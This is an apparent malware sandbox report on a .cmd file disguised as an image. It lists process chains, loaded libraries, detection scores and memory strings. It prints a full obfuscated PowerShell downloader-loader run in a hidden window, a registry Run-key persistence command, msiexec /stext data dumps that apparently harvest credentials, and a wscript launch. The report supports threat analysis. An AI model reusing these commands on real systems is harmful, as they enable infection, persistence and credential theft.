                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000D.00000003.2248577677.00000000049AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2250287489.00000000049B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: rIMG465244247443GULFORDEROpmagasinering.cmdVirustotal: Detection: 23%
                Source: rIMG465244247443GULFORDEROpmagasinering.cmdReversingLabs: Detection: 18%
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-32919
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP im
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbagJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
